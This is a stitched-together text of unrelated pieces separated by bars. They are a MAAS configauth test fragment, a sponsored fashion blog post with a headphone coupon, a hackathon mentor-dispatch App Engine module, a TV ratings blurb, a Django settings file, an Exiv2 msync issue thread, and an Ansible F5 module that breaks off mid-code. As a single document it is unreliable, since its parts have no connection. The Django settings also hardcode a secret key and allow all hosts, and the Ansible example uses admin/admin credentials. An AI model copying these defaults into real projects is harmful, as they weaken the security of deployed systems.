"agents": [
{
"url": "http://example.com:1234",
"username": "user@admin",
}
],
}
json.dump(config, agent_file)
agent_file.flush()
yield agent_file.name
def printout(self):
prints = []
for call in self.mock_print.mock_calls:
_, output, _ = call
# Empty tuple if print is called with no text
output = output[0] if output else ""
prints.append(output)
return "\n".join(prints)
def test_configauth_changes_empty_string(self):
Config.objects.set_config(
"external_auth_url", "http://example.com/candid"
)
call_command("configauth", candid_agent_file="")
self.assertEqual("", Config.objects.get_config("external_auth_url"))
def test_configauth_changes_auth_prompt_default(self):
self.read_input.return_value = ""
call_command("configauth")
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertEqual("", Config.objects.get_config("external_auth_url"))
def test_configauth_changes_auth_invalid_rbac_url(self):
self.assertRaises(
configauth.InvalidURLError,
call_command,
"configauth",
rbac_url="example.com",
)
def test_configauth_delete_sessions(self):
session = Session(
session_key="session_key",
expire_date=datetime.utcnow() + timedelta(days=1),
)
session.save()
call_command("configauth", rbac_url="")
self.assertFalse(Session.objects.all().exists())
def test_update_auth_details(self):
auth_details = configauth.AuthDetails()
with self.agent_file() as agent_file_name:
configauth.update_auth_details_from_agent_file(
agent_file_name, auth_details
)
self.assertEqual(auth_details.url, "http://example.com:1234")
self.assertEqual(auth_details.user, "user@admin")
self.assertEqual(auth_details.key, "private-key")
def test_configauth_interactive(self):
with self.agent_file() as agent_file_name:
self.read_input.side_effect = [
"",
agent_file_name,
"mydomain",
"admins",
]
call_command("configauth")
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
self.assertEqual(
"admins", Config.objects.get_config("external_auth_admin_group")
)
def test_configauth_interactive_domain(self):
with self.agent_file() as agent_file_name:
self.read_input.return_value = "mydomain"
call_command(
"configauth", rbac_url="", candid_agent_file=agent_file_name
)
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
def test_configauth_interactive_domain_empty(self):
with self.agent_file() as agent_file_name:
self.read_input.return_value = ""
call_command(
"configauth", rbac_url="", candid_agent_file=agent_file_name
)
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual("", Config.objects.get_config("external_auth_domain"))
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
def test_configauth_interactive_key(self):
with self.agent_file() as agent_file_name:
self.read_input.return_value = "private-key"
call_command(
"configauth",
rbac_url="",
candid_agent_file=agent_file_name,
candid_domain="mydomain",
)
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
def test_configauth_not_interactive(self):
with self.agent_file() as agent_file_name:
call_command(
"configauth",
rbac_url="",
candid_agent_file=agent_file_name,
candid_domain="mydomain",
candid_admin_group="admins",
)
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
self.assertEqual(
"admins", Config.objects.get_config("external_auth_admin_group")
)
self.read_input.assert_not_called()
def test_configauth_agentfile_not_found(self):
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="",
candid_agent_file="/not/here",
)
self.assertEqual(
str(error), "[Errno 2] No such file or directory: '/not/here'"
)
def test_configauth_domain_none(self):
with self.agent_file() as agent_file_name:
call_command(
"configauth",
rbac_url="",
candid_agent_file=agent_file_name,
candid_domain="none",
)
self.assertEqual("", Config.objects.get_config("external_auth_domain"))
def test_configauth_json_empty(self):
call_command("configauth", json=True)
self.read_input.assert_not_called()
[print_call] = self.mock_print.mock_calls
_, [output], kwargs = print_call
self.assertEqual({}, kwargs)
self.assertEqual(
{
"external_auth_url": "",
"external_auth_domain": "",
"external_auth_user": "",
"external_auth_key": "",
"external_auth_admin_group": "",
"rbac_url": "",
},
json.loads(output),
)
def test_configauth_json_full(self):
Config.objects.set_config(
"external_auth_url", "http://candid.example.com/"
)
Config.objects.set_config("external_auth_domain", "mydomain")
Config.objects.set_config("external_auth_user", "maas")
Config.objects.set_config("external_auth_key", "secret maas key")
Config.objects.set_config("external_auth_admin_group", "admins")
Config.objects.set_config("rbac_url", "http://rbac.example.com/")
mock_print = self.patch(configauth, "print")
call_command("configauth", json=True)
self.read_input.assert_not_called()
[print_call] = mock_print.mock_calls
_, [output], kwargs = print_call
self.assertEqual({}, kwargs)
self.assertEqual(
{
"external_auth_url": "http://candid.example.com/",
"external_auth_domain": "mydomain",
"external_auth_user": "maas",
"external_auth_key": "secret maas key",
"external_auth_admin_group": "admins",
"rbac_url": "http://rbac.example.com/",
},
json.loads(output),
)
def test_configauth_rbac_with_name_existing(self):
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
}
]
call_command(
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="mymaas",
)
self.read_input.assert_not_called()
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertEqual(
self.rbac_user_client.registered_services,
["/api/rbac/v1/service/4"],
)
def test_configauth_rbac_with_name_create(self):
patch_prompt = self.patch(configauth, "prompt_for_choices")
patch_prompt.return_value = "yes"
call_command(
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="maas",
)
patch_prompt.assert_called_once()
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertEqual(
self.rbac_user_client.registered_services,
["/api/rbac/v1/service/4"],
)
def test_configauth_rbac_with_name_abort(self):
patch_prompt = self.patch(configauth, "prompt_for_choices")
patch_prompt.return_value = "no"
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="maas",
)
self.assertEqual(str(error), "Registration with RBAC service canceled")
patch_prompt.assert_called_once()
self.assertEqual(Config.objects.get_config("rbac_url"), "")
self.assertEqual(self.rbac_user_client.registered_services, [])
def test_configauth_rbac_registration_list(self):
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": False,
"product": {"$ref" "/api/rbac/v1/product/2"},
},
{
"name": "mymaas2",
"$uri": "/api/rbac/v1/service/12",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
},
]
# The index of the service to register is prompted
self.read_input.side_effect = ["2"]
call_command("configauth", rbac_url="http://rbac.example.com")
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertEqual(
"http://auth.example.com",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"u-1", Config.objects.get_config("external_auth_user")
)
self.assertNotEqual("", Config.objects.get_config("external_auth_key"))
self.assertEqual("", Config.objects.get_config("external_auth_domain"))
self.assertEqual(
"", Config.objects.get_config("external_auth_admin_group")
)
prints = self.printout()
self.assertIn("1 - mymaas", prints)
self.assertIn("2 - mymaas2 (pending)", prints)
self.assertIn('Service "mymaas2" registered', prints)
def test_configauth_rbac_registration_invalid_index(self):
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
}
]
self.read_input.side_effect = ["2"]
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="http://rbac.example.com",
)
self.assertEqual(str(error), "Invalid index")
def test_configauth_rbac_no_registerable(self):
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="http://rbac.example.com",
)
self.assertEqual(
str(error),
"No registerable MAAS service on the specified RBAC server",
)
def test_configauth_rbac_url_none(self):
with self.agent_file() as agent_file_name:
call_command(
"configauth",
rbac_url="none",
candid_agent_file=agent_file_name,
candid_domain="domain",
candid_admin_group="admins",
)
self.read_input.assert_not_called()
self.assertEqual("", Config.objects.get_config("rbac_url"))
def test_configauth_rbac_url_none_clears_lastsync_and_sync(self):
RBACLastSync.objects.create(resource_type="resource-pool", sync_id=0)
RBACSync.objects.create(resource_type="")
call_command("configauth", rbac_url="none", candid_agent_file="none")
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertFalse(RBACLastSync.objects.all().exists())
self.assertFalse(RBACSync.objects.all().exists())
def test_configauth_rbac_clears_lastsync_and_full_sync(self):
RBACLastSync.objects.create(resource_type="resource-pool", sync_id=0)
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
}
]
call_command(
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="mymaas",
)
self.read_input.assert_not_called()
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertFalse(RBACLastSync.objects.all().exists())
latest = RBACSync.objects.order_by("-id").first()
self.assertEqual(RBAC_ACTION.FULL, latest.action)
self.assertEqual("", latest.resource_type)
self.assertEqual("configauth command called", latest.source)
class TestIsValidUrl(unittest.TestCase):
def test_valid_schemes(self):
for scheme in ["http", "https"]:
url = "{}://example.com/candid".format(scheme)
self.assertTrue(configauth.is_valid_url(url))
def test_invalid_schemes(self):
for scheme in ["ftp", "git+ssh"]:
url = "{}://example.com/candid".format(scheme)
self.assertFalse(configauth.is_valid_url(url))
|
Each year, as I continue to grow as an individual and a brand, I like to showcase the new facets of my life and have them reflected in the content I create. This year more than ever, I’m trying to maintain a firm grasp on my goals, block out the noise, and stay focused. One thing that has definitely helped me do that was incorporating a gym regimen into my weekly routine. I don’t think a lot of people realize how important exercise is, not just for your body, but for your mind as well. That said, I’d be lying if I said it was always easy forcing myself into the gym, especially on days when I feel the most exhausted. For me, music is a huge necessity when exercising, as it really allows me to get lost in the moment and forget any ounce of lingering stress, even if it is just for an hour or so.
I am so grateful that I was offered the opportunity to collaborate with a brand that creates premium-quality headphones for every scenario life has to offer. Sudio is a Swedish brand whose main objective is to provide studio-quality sound through various styles of earphones made for any occasion. As a resident of NYC, I find myself reaching for my earbuds most often while on the train, in the gym, or on those late nights in my apartment when I don’t want to disturb my roommates. Luckily, their sleek styles and practical construction allow for an overall experience of high-quality technology as well as an elegant accessory for your day-to-day style.
I thought it would be cool to switch things up by pairing my new Regent headphones with an activewear ensemble, as it is something I have never done, and because fitness is slowly but surely becoming a consistent part of my life. I loved how the gold accents brought out the detail in my leggings, and the wireless design allowed them to be easily functional with no hassle when taking them on and off. I chose the classic black because, to me, they were the most timeless and can be paired with anything, whether at the gym or on the go. 
Sudio was also generous enough to provide me with a 15% off coupon code, ASTYLEDMIND, which is valid forever on all of their products and add-ons. Please let me know in the comments below if you’re interested in seeing more lifestyle posts in addition to the style blogs we all know and love. Until next time!
|
import webapp2
from template import template
from google.appengine.ext import ndb
from google.appengine.api import datastore_errors
import models
from registration import Hacker
import logging
import json
from google.appengine.api import users
import datetime
maxRating = 5
minRating = 0
def ratingValidator(prop, value):
    # An ndb validator must return the value to store; without the return,
    # the clamped value would be discarded and None stored instead.
    if value > maxRating:
        value = maxRating
    if value < minRating:
        value = minRating
    return value
class MentorResponse(ndb.Model):
rating = ndb.IntegerProperty(default=None, validator=ratingValidator)
request = ndb.KeyProperty(kind='MentorRequest')
mentor = ndb.KeyProperty(kind='Mentor')
dispatched = ndb.DateTimeProperty(auto_now_add=True)
dispatcher = ndb.StringProperty(validator=models.stringValidator)
finished = ndb.DateTimeProperty()
def formatMentorResponse(mentorResponse):
mr = mentorResponse.get()
return {'mentor' : mr.mentor.urlsafe(), 'request' : mr.request.urlsafe(), 'id' : mr.key.urlsafe()}
#Anyone who will give help to a hacker.
class Mentor(ndb.Model):
phone = ndb.StringProperty(validator=models.phoneValidator, default=None)
email = ndb.StringProperty(validator=models.stringValidator, default=None)
name = ndb.StringProperty()
tags = ndb.StringProperty(validator=models.stringValidator, repeated=True)
role = ndb.TextProperty() # e.g. Oracle Engineer
availability = ndb.TextProperty()
details = ndb.TextProperty()
responded = ndb.KeyProperty(kind=MentorResponse, repeated=True)
#perhaps should be key property
assigned = ndb.BooleanProperty(default=False)
def getResponded(self):
return [key.get() for key in self.responded]
def computeAvg(self):
responded = self.getResponded()
ratedResponded = [x for x in responded if x.rating]
if len(ratedResponded) == 0:
return 3
else:
return (reduce(lambda x, y: x + y.rating, ratedResponded, 0) / len(ratedResponded))
def asDict(self, include_keys):
return {key: getattr(self, key, None) for key in include_keys}
def formatMentor(mentor):
md = mentor.asDict(Mentor._properties)
md['responded'] = len(mentor.responded)
md['id'] = mentor.key.urlsafe()
md['rating'] = mentor.computeAvg()
return md
class MentorRequest(ndb.Model):
requester = ndb.KeyProperty(default=None)
requester_phone = ndb.StringProperty(default=None, validator=models.stringValidator)
location = ndb.StringProperty(default=None)
created = ndb.DateTimeProperty(auto_now_add=True)
responses = ndb.KeyProperty(kind=MentorResponse, repeated=True)
issue = ndb.TextProperty(required=False)
tags = ndb.StringProperty(repeated=True)
status = ndb.StringProperty(choices=['solved', 'assigned', 'unassigned'], default='unassigned')
def asDict(self, include_keys):
d = {key: getattr(self, key, None) for key in include_keys}
return d
def formatRequest(mentorRequest):
mr = mentorRequest.asDict(['location', 'created', 'issue', 'tags', 'status'])
mr['created'] = pretty_date(mentorRequest.created)
mr['id'] = mentorRequest.key.urlsafe()
mr['responses'] = len(mentorRequest.responses)
mr['requester_phone'] = mentorRequest.requester_phone
mr['requester_name'] = mentorRequest.requester.get().name if mentorRequest.requester else None
return mr
class MentorRequestHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template('mentor_request.html', {}))
def post(self):
hackers = Hacker.query(Hacker.phone_number == self.request.get('phone')).fetch(keys_only=True)
request = MentorRequest()
request.location = self.request.get('location')
request.issue = self.request.get('issue')
request.tags = self.request.get('tags').split(', ')
if len(hackers):
request.requester = hackers[0]
request.requester_phone = self.request.get('phone')
request.put()
self.redirect('/?dayof=1#mrc') # #mrc: mentor-request-confirm (we don't want that showing up in URLs)
class MentorSignupHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template("mentor_signup.html"))
def post(self):
keys = ['name', 'role', 'email', 'phone', 'availability', 'tags', 'details']
try:
mentor = Mentor()
for key in keys:
val = self.request.get(key)
if key == 'tags':
val = [tag.strip().lower() for tag in val.split(',')]
setattr(mentor, key, val)
mentor.put()
first_name = mentor.name.split(' ')[0] if mentor.name else 'mentor'
self.response.write(template("mentor_signup.html", {"show_confirmation": True, "first_name": first_name}))
except datastore_errors.BadValueError as e:
print "MENTOR SIGNUP ERROR: {0}".format(e)
self.response.write(template("mentor_signup.html", {"error": "There's an invalid or missing field on your form!"}))
class DispatchHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template("mentor_dispatch.html"))
def post(self):
data = json.loads(self.request.body)
request = ndb.Key(urlsafe=data['request']).get()
mentor = ndb.Key(urlsafe=data['mentor']).get()
response = MentorResponse()
response.dispatcher = users.get_current_user().email()
response.mentor = mentor.key
response.request = request.key
response.put()
mentor.responded.append(response.key)
mentor.assigned = True
request.responses.append(response.key)
        request.status = 'assigned'
request.put()
mentor.put()
return self.response.write(json.dumps({'success' : True}))
class ResponseFinishedHandler(webapp2.RequestHandler):
def post(self):
data = json.loads(self.request.body)
response = ndb.Key(urlsafe=data['id']).get()
mentor = response.mentor.get()
request = response.request.get()
if data.get('rating'):
response.rating = int(data.get('rating'))
request.status = data['status'] #could be completed or unassigned
response.finished = datetime.datetime.now()
mentor.assigned = False
response.put()
mentor.put()
request.put()
return self.response.write(json.dumps({'success' : True}))
class GetRequestsHandler(webapp2.RequestHandler):
def get(self):
requests = map(formatRequest, MentorRequest.query(MentorRequest.status == 'unassigned').order(MentorRequest.created).fetch())
return self.response.write(json.dumps({'requests' : requests}))
class GetAssignedHandler(webapp2.RequestHandler):
def get(self):
mentors = Mentor.query(Mentor.assigned == True).fetch()
mentors = map(formatMentor, mentors)
requests = MentorRequest.query(MentorRequest.status == 'assigned').fetch()
pairs = [r.responses[-1] for r in requests if len(r.responses) > 0]
pairs = map(formatMentorResponse, pairs)
requests = map(formatRequest, requests)
self.response.write(json.dumps({'assigned_mentors' : mentors, 'assigned_requests' : requests, 'pairs' : pairs}))
class ViewRequestHandler(webapp2.RequestHandler):
def get(self, id):
request = ndb.Key(urlsafe=id).get()
mentors = map(formatMentor, findMentorsForRequest(request))
return self.response.write(json.dumps({'request' : formatRequest(request), 'mentors' : mentors}))
def findMentorsForRequest(request):
tags = [t.lower() for t in request.tags]
mentors = Mentor.query(Mentor.assigned == False).fetch()
# Each mentor should be assessed based on:
# 1. # of tags matching that of request
# 2. # of previously completed tasks balanced with rating
# should return list of best mentors
#First sort by responded.
mentors.sort(key=lambda m: len(m.responded))
#Then sort by rating
mentors.sort(key=lambda m: m.computeAvg(), reverse=True)
#Finally sort by relevance of tags
mentors.sort(key=lambda m: len([t for t in m.tags if t.lower() in request.tags]), reverse=True)
return mentors
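The three chained sorts above work because Python's `list.sort` is stable: sorting by the least important key first and the most important key last yields a layered ordering. A self-contained sketch with hypothetical mentor dicts (not the ndb models):

```python
# Stable-sort layering, as in findMentorsForRequest above:
# least important key first, most important key last.
mentors = [
    {'name': 'A', 'tags': ['web'], 'responded': 5, 'rating': 4.0},
    {'name': 'B', 'tags': ['web', 'db'], 'responded': 1, 'rating': 3.0},
    {'name': 'C', 'tags': ['db'], 'responded': 2, 'rating': 5.0},
]
request_tags = ['web', 'db']

mentors.sort(key=lambda m: m['responded'])                     # tertiary key
mentors.sort(key=lambda m: m['rating'], reverse=True)          # secondary key
mentors.sort(key=lambda m: len([t for t in m['tags'] if t in request_tags]),
             reverse=True)                                     # primary key
print([m['name'] for m in mentors])  # → ['B', 'C', 'A']
```

B wins on tag overlap (two matches); C and A tie on one match each, so the secondary rating sort puts C first.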
def pretty_date(time=False):
"""
Get a datetime object or a int() Epoch timestamp and return a
pretty string like 'an hour ago', 'Yesterday', '3 months ago',
'just now', etc
"""
now = datetime.datetime.now()
if type(time) is int:
diff = now - datetime.datetime.fromtimestamp(time)
elif isinstance(time,datetime.datetime):
diff = now - time
elif not time:
diff = now - now
second_diff = diff.seconds
day_diff = diff.days
if day_diff < 0:
return ''
if day_diff == 0:
if second_diff < 10:
return "just now"
if second_diff < 60:
return str(second_diff) + " seconds ago"
if second_diff < 120:
return "a minute ago"
if second_diff < 3600:
return str(second_diff / 60) + " minutes ago"
if second_diff < 7200:
return "an hour ago"
if second_diff < 86400:
return str(second_diff / 3600) + " hours ago"
if day_diff == 1:
return "Yesterday"
if day_diff < 7:
return str(day_diff) + " days ago"
if day_diff < 31:
return str(day_diff / 7) + " weeks ago"
if day_diff < 365:
return str(day_diff / 30) + " months ago"
return str(day_diff / 365) + " years ago"
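The day-level buckets of `pretty_date` can be exercised in isolation; this trimmed restatement covers only the `day_diff` branch (the `second_diff` refinements for day zero are collapsed into a placeholder):

```python
def pretty_days(day_diff):
    """Same bucket boundaries as pretty_date above, days only."""
    if day_diff < 0:
        return ''
    if day_diff == 0:
        return 'today'  # the full function refines this with second_diff
    if day_diff == 1:
        return 'Yesterday'
    if day_diff < 7:
        return str(day_diff) + ' days ago'
    if day_diff < 31:
        return str(day_diff // 7) + ' weeks ago'
    if day_diff < 365:
        return str(day_diff // 30) + ' months ago'
    return str(day_diff // 365) + ' years ago'

print(pretty_days(3))    # → 3 days ago
print(pretty_days(14))   # → 2 weeks ago
print(pretty_days(90))   # → 3 months ago
print(pretty_days(730))  # → 2 years ago
```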
class MentorListHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template("mentor_list.html", {"mentors": Mentor.query().fetch(limit=1000)}))
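As a quick illustration of `computeAvg` above: it averages only the rated responses and falls back to 3 when none are rated. A standalone sketch with hypothetical response objects (note that under Python 2, where this module runs, the division is integer division):

```python
from functools import reduce  # built-in on Python 2; imported on Python 3

class Resp(object):
    def __init__(self, rating):
        self.rating = rating

responded = [Resp(4), Resp(5), Resp(None), Resp(3)]
rated = [r for r in responded if r.rating]  # drop unrated responses
avg = reduce(lambda acc, r: acc + r.rating, rated, 0) / len(rated) if rated else 3
print(avg)  # 4 on Python 2 (integer division), 4.0 on Python 3
```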
|
48 HOURS MYSTERY last Saturday (4) was first in adults 25-54 (3.3/09), adults 18-49 (2.6/08) and second in households (5.8/10) and viewers (8.60m). This is 48 HOURS MYSTERY's best delivery in households, viewers and key demos since Nov. 26, 2005.
Compared to the same night last year, 48 HOURS MYSTERY was up +29% in viewers, +23% in households, +32% in adults 25-54 and +37% in adults 18-49.
48 HOURS MYSTERY is broadcast Saturdays (10:00-11:00 PM, ET/PT). Susan Zirinsky is the executive producer.
|
"""
Django settings for mapa project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'l00f7@-+!--7$ah@n%--7sq_zkot66367zs(in+u3(=o9-j102'
# SECURITY WARNING: don't run with debug turned on in production!
# os.getenv returns a string, so any non-empty value (even 'False' or '0')
# would be truthy; compare against known true values instead.
DEBUG = os.getenv('DEBUG', '').lower() in ('1', 'true', 'yes')
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'django_filters',
'cronotacografo',
'rest_framework',
'rest_framework_gis',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mapa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mapa.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'HOST': os.getenv('DB_HOST'),
'NAME': os.getenv('DB_NAME'),
'USER': os.getenv('DB_USER'),
'PASSWORD': os.getenv('DB_PASSWORD')
},
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'DEFAULT_FILTER_BACKENDS': [
'django_filters.rest_framework.DjangoFilterBackend',
'rest_framework.filters.SearchFilter',
],
}
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_ROOT = '/usr/src/app/static/'
STATIC_URL = '/static/'
# Allow bulk deletion in admin
DATA_UPLOAD_MAX_NUMBER_FIELDS = 9999999999999
|
Added by Thomas Beutlich almost 4 years ago. Updated over 3 years ago.
I revisited the commits bound to #1043, esp. r3630. I do not think that msync is necessary for MemIo. According to http://man7.org/linux/man-pages/man2/msync.2.html, msync is only useful for memory-mapped files, which is not the case in MemIo. I would rather see it in FileIo, where memory-mapped files are used. Thus my questions in #1043-28 (28) and #1043-29 (29) are still not answered.
#1077: Removed msync() calls from MemIo.
Stumbled upon this because valgrind complains about msync() being called with uninitialized parameters.
After some reading, I agree with Thomas that msync() is not necessary for MemIo. I'd simply remove it. Also, according to this thread, it is not needed before munmap(), at least on POSIX systems.
Robin, I'm not making any changes since you plan to revisit this. If you're ok with my suggestion, you can assign this issue to me and I'll do it.
I'm more than happy to pass this over to you, Andreas. Thank You.
Removed msync() calls from MemIo. Valgrind is happy again. Not planning to make changes to FileIo.
Thanks for considering and fixing this.
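As a rough illustration of the point (in Python rather than the Exiv2 C++ code; `mmap.flush()` is a thin wrapper over `msync(2)`): syncing only matters for a file-backed mapping, while a pure in-memory buffer like the one MemIo manages has no backing file to sync.

```python
import mmap
import os
import tempfile

# File-backed mapping: flush() (the msync analog) pushes dirty pages to the file.
fd, path = tempfile.mkstemp()
os.write(fd, b'\x00' * mmap.PAGESIZE)
os.close(fd)

with open(path, 'r+b') as f:
    mm = mmap.mmap(f.fileno(), mmap.PAGESIZE)
    mm[:5] = b'hello'
    mm.flush()   # meaningful here: the backing file must observe the write
    mm.close()

with open(path, 'rb') as f:
    data = f.read(5)
print(data)  # → b'hello'

# A pure in-memory buffer (the MemIo situation) lives only in RAM:
# there is no backing file, so there is nothing for msync to do.
buf = bytearray(b'hello')
os.unlink(path)
```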
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2016-2018, Eric Jacob <erjac77@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: f5bigip_ltm_profile_mssql
short_description: BIG-IP ltm profile mssql module
description:
- Configures a profile to manage mssql(tds) database traffic.
version_added: "2.4"
author:
- "Gabriel Fortin (@GabrielFortin)"
options:
partition:
description:
- Displays the administrative partition within which the profile resides.
read_pool:
description:
            - Specifies the pool of MS SQL database servers to which the system sends read-only requests.
read_write_split_by_command:
description:
            - When enabled, the system decides which pool to send the client requests to based on the content of the message.
default: disabled
choices: ['disabled', 'enabled']
read_write_split_by_user:
description:
            - When enabled, the system decides which pool to send the client requests to based on the user name.
default: disabled
choices: ['disabled', 'enabled']
state:
description:
- Specifies the state of the component on the BIG-IP system.
default: present
choices: ['absent', 'present']
user_can_write_by_default:
description:
- Specifies whether users have write access by default.
default: true
choices: ['false', 'true']
user_list:
description:
- Specifies the users who have read-only access to the MS SQL if user-can-write-by-default is true, or the
users who have write access to the MS SQL database if user-can-write-by-default is false.
write_persist_timer:
description:
            - Specifies the minimum time, in milliseconds, that the connection persists to the write pool after
              switching to the write pool.
write_pool:
description:
- Specifies the pool of MS SQL database servers to which the system sends requests that are not read-only.
requirements:
- BIG-IP >= 12.0
- ansible-common-f5
- f5-sdk
'''
EXAMPLES = '''
- name: Create LTM Profile MSSQL
f5bigip_ltm_profile_mssql:
f5_hostname: 172.16.227.35
f5_username: admin
f5_password: admin
f5_port: 443
name: my_mssql_profile
partition: Common
state: present
delegate_to: localhost
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible_common_f5.base import F5_ACTIVATION_CHOICES
from ansible_common_f5.base import F5_NAMED_OBJ_ARGS
from ansible_common_f5.base import F5_PROVIDER_ARGS
from ansible_common_f5.bigip import F5BigIpNamedObject
class ModuleParams(object):
@property
def argument_spec(self):
argument_spec = dict(
read_pool=dict(type='str'),
read_write_split_by_command=dict(type='str', choices=F5_ACTIVATION_CHOICES),
read_write_split_by_user=dict(type='str', choices=F5_ACTIVATION_CHOICES),
user_can_write_by_default=dict(type='str', choices=['false', 'true']),
user_list=dict(type='list'),
write_persist_timer=dict(type='int'),
write_pool=dict(type='str')
)
argument_spec.update(F5_PROVIDER_ARGS)
argument_spec.update(F5_NAMED_OBJ_ARGS)
return argument_spec
@property
def supports_check_mode(self):
return True
class F5BigIpLtmProfileMssql(F5BigIpNamedObject):
def _set_crud_methods(self):
self._methods = {
'create': self._api.tm.ltm.profile.mssqls.mssql.create,
'read': self._api.tm.ltm.profile.mssqls.mssql.load,
'update': self._api.tm.ltm.profile.mssqls.mssql.update,
'delete': self._api.tm.ltm.profile.mssqls.mssql.delete,
